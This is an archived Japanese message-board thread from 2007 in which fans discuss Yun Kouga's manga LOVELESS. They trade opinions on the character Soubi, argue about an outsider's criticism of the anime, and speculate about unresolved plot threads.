113 :花と名無しさん:2007/11/29(木) 12:24:06 ID:???0
いまどきの若い人には絵は古くてちょっときついかも
でも歳をとってから読むより若いときに読んだほうが共鳴できるタイプの漫画だと思う

114 :花と名無しさん:2007/11/29(木) 16:14:50 ID:???0
アニメのLOVELESS 見たけど、
主人公総受のテンプレみたいな作品で激しくキモかったです… orz

中でも、虐待受けてる小学生の孤独に付け入る
大学生のロンゲ男が一番キモかった
あれがBLじゃなくて男女だったとしても同じ様にキモかったと思う
せめて主人公が高校生とかなら何ぼかマシだったのかもしれないけど

115 :花と名無しさん:2007/11/29(木) 16:21:12 ID:???0
大丈夫だその大学生はもっとひどい虐待を受けている

116 :花と名無しさん:2007/11/29(木) 16:24:08 ID:???O
BLダメだ共依存ダメだ、という観点からみると
がゆん作品はどれもきつそうだ

ぶっちゃけそういう設定やあらすじより台詞回しとかを楽しむ系の作品かと思ってる

まあ良くも悪くも同人

117 :花と名無しさん:2007/11/29(木) 17:16:46 ID:???0
>115
アニメでもそっちの虐待(アッー!)も描かれてたけど
114はそれを見てもそういう感想なのでは…

118 :花と名無しさん:2007/11/29(木) 19:56:48 ID:???O
草灯最低最低キモいキモいと思いながら萌える漫画かと思っていました

119 :花と名無しさん:2007/11/29(木) 20:56:19 ID:???0
草灯は本当にキモイよな。それだけはガチ。
でもこの漫画はそれなりに好きw

120 :花と名無しさん:2007/11/29(木) 21:15:46 ID:???0
草灯はキモカワ


と思ってた時期が私にもありました
今はキモイとしか思えry…一番好きなキャラなのに何でだw

121 :花と名無しさん:2007/11/29(木) 22:06:35 ID:???0
キモくない草灯なんて草灯じゃありません

122 :花と名無しさん:2007/11/29(木) 22:28:39 ID:???O
今月号の草灯はウザすぎるだろ常考w

中二病患者にああいうのいるww

123 :花と名無しさん:2007/11/30(金) 00:36:07 ID:???0
>>114
主人公総受って時点で間違ってる
立夏は攻めだ
原作もアニメも立夏×草灯だよ
大学生が小学生に抱いてくれって縋りつくようなマンガです

124 :花と名無しさん:2007/11/30(金) 01:47:59 ID:???0
だよねー立夏は攻。
草灯と清明から、与える役回りを期待されてる小学生。

125 :花と名無しさん:2007/11/30(金) 01:57:07 ID:???0
草灯への「うざっ」っていうチビゼロのツッコミが的確だったw

キオの死亡フラグじゃなくて、清明の真の目的が明かされるんじゃない?
どうして学園に来たのかまだ不明だし。

126 :花と名無しさん:2007/11/30(金) 12:14:58 ID:???O
草がうぜぇキメェよりも絵の荒れかたが気になって……

127 :花と名無しさん:2007/11/30(金) 13:04:56 ID:???O
2001年のメルマガ見ると、ラブレス、当初は草灯が主役の予定だったんだね

128 :花と名無しさん:2007/11/30(金) 22:58:44 ID:???O
読者「おいがゆん、もっと真面目に描けよ!」
がゆん「嫌だ」

129 :花と名無しさん:2007/11/30(金) 23:31:13 ID:???0
読者「おいがゆん、もっと真面目に描けよ!」
がゆん「待てないなら読まなくていいよpgr」

130 :花と名無しさん:2007/11/30(金) 23:50:39 ID:???0
読者「おいがゆん、もっと真面目に描けよ!」
がゆん「大丈夫出来てます全然平気、絶対描けます待っててね☆」


131 :花と名無しさん:2007/12/01(土) 00:07:14 ID:???0
それだな

132 :花と名無しさん:2007/12/01(土) 00:31:03 ID:???0
皆様レスd
師匠に鞭で打たれてる?シーンはあったけど、
あれはアッー!なんですか(lll´Д`)キガツカナカッタヨ

>大学生が小学生に抱いてくれって縋りつくようなマンガです
うわぁ…
受けといったのは主人公が周囲からモテモテなのがソレっぽいと思ったので
主人公の「会いたいけど会いたくない」みたいな台詞も(ry でした

しかし住人の方々はキャラや作品のキモイ所も受け入れつつ愛しているんですね
そういう愛情もあるんですね
キャラもそうなんですけど作品内に流れる空気みたいなものが駄目だったんですが
私に合ってなかったって事なんでしょうね

133 :花と名無しさん:2007/12/01(土) 01:04:57 ID:???0
わざわざ専スレに合ってなかっただのキモいだのホモがダメだの
言いにこなくていいです
チラシの裏かはき捨てスレにでもいってくれ

134 :花と名無しさん:2007/12/01(土) 01:34:31 ID:???0
つかこの人が見たのってアニメじゃんか>>114
微妙にスレ違いだよ。漫画読んでから来いよ。

自分も漫画は好きだけどアニメの空気とかは
何かキモイし駄目だった。
何が違うのかよくわからんが、その部分がたぶん
自分の中でのがゆん漫画と他のBL漫画との境界なんだろなあと思った。


135 :花と名無しさん:2007/12/01(土) 01:44:10 ID:???0
危ういバランスを保ってるマンガだよね。
あとちょっといきすぎると引いちゃうところを、さらっと描かかれてる
から読めるというか。がゆんはそういうの上手いと思う。
今回も草灯と立夏のやり取りが面白かった。
今後もせめてこれくらいのページ数はありますように…

136 :花と名無しさん:2007/12/01(土) 01:49:28 ID:???0
レスd そしてすみませんでした
検索してみたらアニメのスレがあって、スレ違いでした

しかし専用スレって…作家のスレが一つしかないのなら
信者スレとアンチスレの両方を兼ねるものなのでは

137 :花と名無しさん:2007/12/01(土) 01:55:38 ID:???0
アンチになって執着されるような作家でもないよな。
アンチになるくらいならもう完全スルーしてんじゃないの。
ファンですら諦めきって文句垂れてるし。

138 :花と名無しさん:2007/12/01(土) 02:05:13 ID:???0
がゆん叩き別にかまわないが
原作読みもしないチラシの裏みたいな感想で
キモいだのホモがいやだの叩きで
わざわざスレ探してまで叩きにくるのは荒らしと一緒だろ

139 :花と名無しさん:2007/12/01(土) 10:26:26 ID:???O
なんでそんなにピリピリしてんだよ皆w
忌憚ない第三者的意見の投下は今のがゆんに一番必要なもんだと思うよ?
商業続けていくならな
>>134
それわかる
自分も所謂BL漫画には興味ないクチだ

140 :花と名無しさん:2007/12/01(土) 10:29:45 ID:???O
あっでもアニメは純粋に絵の綺麗さを楽しみつつ
声の芝居に爆笑してたけどねwあれは別の作品

141 :花と名無しさん:2007/12/01(土) 10:48:37 ID:???0
>>139
原作読んでない第三者の意見は必要ないだろ

142 :花と名無しさん:2007/12/01(土) 12:32:36 ID:???O
まぁ端から見たらがゆんなんて立派に商業BL系だけどなw
がゆん漫画にあまりBL臭を感じないのは
女の子視点の恋愛も含まれてるからじゃないかな

143 :花と名無しさん:2007/12/01(土) 15:31:22 ID:???0
だろうな。
俺は他のBLは無理だが、がゆんは普通に読める。

144 :花と名無しさん:2007/12/01(土) 15:40:24 ID:???0
原作読んできて>>114と同じ意見を言っても
>>133はフォモに苦手意識がある意見は受け付けないだろう

がゆんったってたまにノーマルも書いてるんだけどね

145 :花と名無しさん:2007/12/01(土) 16:07:02 ID:???0
飢餓一族とかノーマルだもんな
あの男はキモかったけど、下手なポエムを喜んで朗読してる文芸部長は可愛かったw

146 :花と名無しさん:2007/12/01(土) 16:46:24 ID:???0
今月は草灯のダメな子っぷりと立夏の器の大きさがいいが
なんかgdgdだったな
いっそ草灯が清明に回収されて立夏が取り戻しにいくほうが
話進んだんじゃ

147 :花と名無しさん:2007/12/01(土) 19:48:21 ID:???0
ttp://www.vipper.org/vip681336.jpg

148 :花と名無しさん:2007/12/01(土) 19:52:38 ID:???0
どうしたの?w

149 :花と名無しさん:2007/12/01(土) 20:23:33 ID:???0
今回の面白かったけど、ふりだしに戻った感じなので、
そしたらまたエンディングが遠のくような気がする…
次回で明らかになる?「清明のしたこと」の内容によっては
話が進むのかな。
清明の罪ってまだ明らかにされてない?

150 :花と名無しさん:2007/12/01(土) 22:15:39 ID:???0
いつものようにたいしたことない理由なんじゃ

151 :花と名無しさん:2007/12/02(日) 18:48:57 ID:???O
今月でぷっつり【未完】
がゆんならありそうでな………

152 :花と名無しさん:2007/12/02(日) 20:20:59 ID:???0
戦闘機とサクリファイスがつながってる「糸」の話
面白かったけど、あの話ももう出なさそうだな…
あれでLOVELESSの戦闘機が分かるかなと期待してたんだけど。

153 :花と名無しさん:2007/12/02(日) 22:49:56 ID:???O
正直ブギーポップの同人が予告通りに発行されなかったことだけがこの人への心残りだ…

154 :花と名無しさん:2007/12/02(日) 23:20:37 ID:???0
そういえば立夏のほんとの戦闘機すっかり忘れてた
がゆんも忘れてそうだけど

155 :花と名無しさん:2007/12/02(日) 23:41:07 ID:???O
ユイコかな
ユイコだと萌えるな
それかオサム?

156 :花と名無しさん:2007/12/03(月) 00:35:37 ID:???O
あれは空白の戦闘機の伏線&立夏と草灯は全然繋がってないんだよ、ってのを絵にしただけな気がする

でも今月の逆らえない草灯のシーン、あれ糸が見えてる状態だとどんな風になるんだろ


157 :花と名無しさん:2007/12/03(月) 13:30:13 ID:???0
立夏の戦闘機は清明にあぼーんされたんだとばかり思ってた・・・

158 :花と名無しさん:2007/12/03(月) 14:18:54 ID:???O
ユイコだったらあっと言う間にあぼーんされちゃうだろw
言語による闘争だしw

159 :花と名無しさん:2007/12/03(月) 19:45:26 ID:???0
でもおばかなユイコに序盤のほうで
立夏が本読んで言葉を学べって感じのこと言ってたよね
あれが実はユイコ戦闘機の複線だったりするのかと思ったこともあったんだが

160 :花と名無しさん:2007/12/03(月) 21:05:13 ID:???0
そんなこともう忘れてる

161 :花と名無しさん:2007/12/03(月) 21:27:00 ID:???0
忘れるもなにも、最初っから何もなかったんだ。

162 :花と名無しさん:2007/12/03(月) 23:52:43 ID:???0
>>159
それもあったし逆上がりのやつとかジャンケンのとか
ユイコっぽい伏線はあるけど
がゆんだから

っていうのをゲシュ最終回読んで再認識した

163 :花と名無しさん:2007/12/04(火) 08:06:54 ID:???O
>>151
「俺達の戦いはこれからだ!」



皆様長い間応援ありg(ry

164 :花と名無しさん:2007/12/04(火) 16:19:10 ID:???0
>>159
それプラス、ユイコはビーズ飾り作るのが好きで、
色彩感覚が良いって草灯に褒められてたよね
メイに対しても「言葉は弱いけどイメージが強いしうまい」みたいなこと言ってたから
ユイコもそういうタイプの戦闘機なのかなって自分も思ってた
けど・・・がゆんだから…

41 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)